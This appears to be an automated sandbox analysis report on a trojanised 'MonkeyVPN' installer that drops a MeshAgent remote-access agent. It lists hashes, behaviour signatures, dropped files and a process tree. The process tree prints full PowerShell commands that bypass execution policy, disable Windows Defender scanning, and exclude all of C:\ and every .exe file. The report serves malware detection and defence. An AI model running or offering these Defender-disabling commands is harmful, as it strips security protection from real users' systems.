Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 07:04

General

  • Target

    MonkeyVPN1.1.2.exe

  • Size

    43.2MB

  • MD5

    f3696254e6992deccbff25ab0af2ebc8

  • SHA1

    54ca8798c4e4eb8a455769ab706cc3de7fa1917d

  • SHA256

    ce92f52a6bc1f39cb592766cbf17e5bed63fa59eda5c88a961517ba3da5b49d3

  • SHA512

    fc58762f3436e0c32d57ffdba6f3fc3eeb176a52eed93c41b3c867fd24e5eb431bb46a2e89c375598ae37c83ec726dc74b1a61ee18e5c583e339ad4a3de1e8e7

  • SSDEEP

    786432:W+ZLhn5jG92pLhIvTIUBEiigLdfKRo8lS1h2a35VdZn33DmzBt/vWJZlZj1SXgfK:WULhn5jGWVIbIUBUsxMlmV3nHnnD6TX5

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe
    "C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4380
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:3512
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:1996
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Users\Admin\AppData\Local\Temp\start.exe
        start.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3452
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI92F9.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3340
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 861EEC0975AD77256AB6AFD564D17DFA C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:384
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
        PID:3812
      • C:\Windows\system32\wbem\wmic.exe
        wmic os get oslanguage /FORMAT:LIST
        2⤵
          PID:3668
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:60
          • C:\Windows\system32\wbem\wmic.exe
            wmic os get oslanguage /FORMAT:LIST
            2⤵
              PID:1852
            • C:\Windows\System32\wbem\wmic.exe
              wmic SystemEnclosure get ChassisTypes
              2⤵
                PID:4412
              • C:\Windows\System32\wbem\wmic.exe
                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                2⤵
                  PID:2240
              • C:\Users\Admin\AppData\Local\naver\naver.exe
                "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
                1⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:1700
                • C:\Windows\System32\wbem\wmic.exe
                  wmic SystemEnclosure get ChassisTypes
                  2⤵
                    PID:4332
                  • C:\Windows\system32\wbem\wmic.exe
                    wmic os get oslanguage /FORMAT:LIST
                    2⤵
                      PID:808
                    • C:\Windows\System32\wbem\wmic.exe
                      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                      2⤵
                        PID:1272
                      • C:\Windows\System32\wbem\wmic.exe
                        wmic SystemEnclosure get ChassisTypes
                        2⤵
                          PID:3440
                        • C:\Windows\System32\wbem\wmic.exe
                          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                          2⤵
                            PID:208
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -noprofile -nologo -command -
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            PID:3756

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          2f57fde6b33e89a63cf0dfdd6e60a351

                          SHA1

                          445bf1b07223a04f8a159581a3d37d630273010f

                          SHA256

                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                          SHA512

                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Filesize

                          53KB

                          MD5

                          a26df49623eff12a70a93f649776dab7

                          SHA1

                          efb53bd0df3ac34bd119adf8788127ad57e53803

                          SHA256

                          4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                          SHA512

                          e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          11a4be5f9e5fdf4a714849b63ea2f086

                          SHA1

                          97ec6e61a365b04d572e100699c37ebbbda9c5d2

                          SHA256

                          7854010dfa1f008ac8f26493dfbbc378bafb67e4e3dc9d1a13ce408668f2fac4

                          SHA512

                          807ea1222e227985901057c3337d80b587174b3e8b9e50d4d8b4bd67ce500e3e891057f318b74c401196612dcb969862bb6edda2f938f573a54ac53ff88efea8

                        • C:\Users\Admin\AppData\Local\Temp\MSI92F9.tmp

                          Filesize

                          30.3MB

                          MD5

                          71141c5e6c5aa8e363f64c6014588d9b

                          SHA1

                          fd759473d536ce9423d3e9efb6f0b118f149e0d4

                          SHA256

                          26188d91a417a4c4c8c9226015ad6b5f4ddb86ca3bac9031206efc9e45acfc8e

                          SHA512

                          187314ecf0395d2245d37b0b3f2361896dcf6f6fa0d30b0c724c8a73a9d45c1798357654d863c8b304f775bfd32f0c30e0735a7abb5edbe0aeb4166046472b41

                        • C:\Users\Admin\AppData\Local\Temp\MSI9E15.tmp

                          Filesize

                          298KB

                          MD5

                          684f2d21637cb5835172edad55b6a8d9

                          SHA1

                          5eac3b8d0733aa11543248b769d7c30d2c53fcdb

                          SHA256

                          da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

                          SHA512

                          7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yidyafq4.5ju.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\start.exe

                          Filesize

                          30.4MB

                          MD5

                          5b073f98aab6e4f779aadd9f9d4b75a2

                          SHA1

                          c81700159450dc0ac7c40f7e73203a963fd83e9a

                          SHA256

                          0b04da17c658f67b1b74afb9831e09664dc976a401350a9b8e1f76c1e3c5caca

                          SHA512

                          84c4be46cbdbc40e5a90e2dce2a1c58ecf6816cc47cc9aa4105730deefb8c691ce406aa35b90152baffcf93564dec4ce747995ee0ba2573f6fa480f3e143780d

                        • C:\Users\Admin\AppData\Local\naver\naver.db

                          Filesize

                          131KB

                          MD5

                          1abe9befaa0a622b030d0821d279427f

                          SHA1

                          c62a53bc4f540873c503ddd74eae868677494777

                          SHA256

                          dc83d02eb8f7f6e81777a109a9f9765b468369c482d336be07a866f6e3d8c4d4

                          SHA512

                          d4c8379fe3617395a3ffaf8ceb53a56d4e30e2ebeed0aa0c0022f89bead065c705c30f22ed0f83acea9f84dbe226e99471a34fef0e91a30de7a4b0439447dfc8

                        • C:\Users\Admin\AppData\Local\naver\naver.exe

                          Filesize

                          5.3MB

                          MD5

                          ebf9e3ebfc0b3f99e971a1be4f0072c6

                          SHA1

                          ffd1d6dccf254d70605b1624980d8f01d8783d6f

                          SHA256

                          d819ee6d4691be3c4729edccc32cd763f506860892459c275045282127552414

                          SHA512

                          c1d31f2d70ae4d5733914d94a0ad438f47ffa3364bd06a57291f0a9772e70d30a7b09094dc50c1391f4890249c11d6256dcb38d83115632cf53eb334e8702407

                        • C:\Users\Admin\AppData\Local\naver\naver.msh

                          Filesize

                          22KB

                          MD5

                          2dd515ea546a81398d94dd15e3b4d55c

                          SHA1

                          eb0b0fca721a296906166b7e972559b87353b726

                          SHA256

                          becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

                          SHA512

                          439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

                        • C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F1F1B0B6369A84B2B68552FDC57ABDEB60805A02

                          Filesize

                          1KB

                          MD5

                          fea22cdc65b314eaf6445fbf97e961f9

                          SHA1

                          bfd8ec802a7e36b4fe98666313f0324417523ced

                          SHA256

                          3d9ee364e8a4bdc4ceff4b2e10a570c478f5b7b75fc39508bdad905086a00850

                          SHA512

                          f6eefb64873c90fc6e81603aa60ebf00a468c8fa52c18fb750236afc9ec889008e4194549f976dce555fb0c73e7fd15cd65654cde703998b34db6144697065ed

                        • memory/2912-52-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-24-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-30-0x0000020733F00000-0x0000020733F76000-memory.dmp

                          Filesize

                          472KB

                        • memory/2912-29-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-50-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-28-0x0000020733E30000-0x0000020733E74000-memory.dmp

                          Filesize

                          272KB

                        • memory/2912-59-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-27-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4472-33-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4472-4-0x00007FFF6DB63000-0x00007FFF6DB65000-memory.dmp

                          Filesize

                          8KB

                        • memory/4472-23-0x0000029AEFFB0000-0x0000029AEFFD2000-memory.dmp

                          Filesize

                          136KB

                        • memory/4472-26-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4472-25-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4728-49-0x0000000000160000-0x00000000032FF000-memory.dmp

                          Filesize

                          49.6MB

                        • memory/4728-0-0x0000000000160000-0x00000000032FF000-memory.dmp

                          Filesize

                          49.6MB

                        • memory/4728-51-0x0000000000160000-0x00000000032FF000-memory.dmp

                          Filesize

                          49.6MB